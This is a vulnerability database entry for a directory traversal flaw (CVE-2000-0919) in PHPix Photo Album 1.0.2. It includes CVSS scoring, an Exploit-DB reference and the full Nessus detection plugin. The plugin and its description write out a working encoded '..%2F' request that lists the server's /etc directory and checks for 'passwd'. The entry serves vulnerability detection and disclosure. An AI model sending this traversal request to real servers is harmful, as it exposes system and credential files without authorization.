1.0.2

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

NONE

Availability impact

NONE

network

low complexity

phpix

nessus

exploit available

NVD

Published: 2000-12-19

Updated: 2017-10-10

Summary

Directory traversal vulnerability in PHPix Photo Album 1.0.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack.

Vulnerable Configurations

Part	Description	Count
Application	Phpix Phpix Phpix 1.0 Phpix Phpix 1.0.1 Phpix Phpix 1.0.2	3

Exploit-Db

description	PHPix 1.0 Directory Traversal Vulnerability. CVE-2000-0919. Webapps exploit for php platform
id	EDB-ID:20278
last seen	2016-02-02
modified	2000-10-07
published	2000-10-07
reporter	Synnergy.net
source	https://www.exploit-db.com/download/20278/
title	phpix 1.0 - Directory Traversal Vulnerability

Nessus

NASL family	CGI abuses
NASL id	PHPIX.NASL
description	The PHPix program allows an attacker to read arbitrary files on the remote web server, prefixing the pathname of the file with ..%2F..%2F.. For example: GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 will return all the files that are nested within /etc directory.
last seen	2020-06-01
modified	2020-06-02
plugin id	10574
published	2000-12-11
reporter	This script is Copyright (C) 2000-2018 Zorgon <[email protected]>
source	https://www.tenable.com/plugins/nessus/10574
title	PHPix album Parameter Encoded Traversal Arbitrary File/Directory Access
code	# # This script was written by Zorgon <[email protected]> # # See the Nessus Scripts License for details # include("compat.inc"); if(description) { script_id(10574); script_version ("1.25"); script_cve_id("CVE-2000-0919"); script_bugtraq_id(1773); script_name(english:"PHPix album Parameter Encoded Traversal Arbitrary File/Directory Access"); script_set_attribute(attribute:"synopsis", value: "Arbitrary files can be read on the remote host." ); script_set_attribute(attribute:"description", value: "The PHPix program allows an attacker to read arbitrary files on the remote web server, prefixing the pathname of the file with ..%2F..%2F.. For example: GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 will return all the files that are nested within /etc directory." ); script_set_attribute(attribute:"solution", value: "Contact your vendor for the latest software release." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2000/12/11"); script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/07"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe",value:"cpe:/a:phpix:phpix"); script_end_attributes(); script_summary(english:"PHPix directory traversal vulnerability"); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2000-2020 Zorgon <[email protected]>"); script_family(english:"CGI abuses"); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0); } # # The script code starts here # include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80, embedded:TRUE); if(get_port_state(port)) { buf = http_get(item:string("/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0"), port:port); rep = http_keepalive_send_recv(port:port, data:buf); if("Prev 20" >< rep) { if(("group" >< rep) && ("passwd" >< rep)) security_warning(port); } }

Summary

Vulnerable Configurations

Exploit-Db

Nessus

References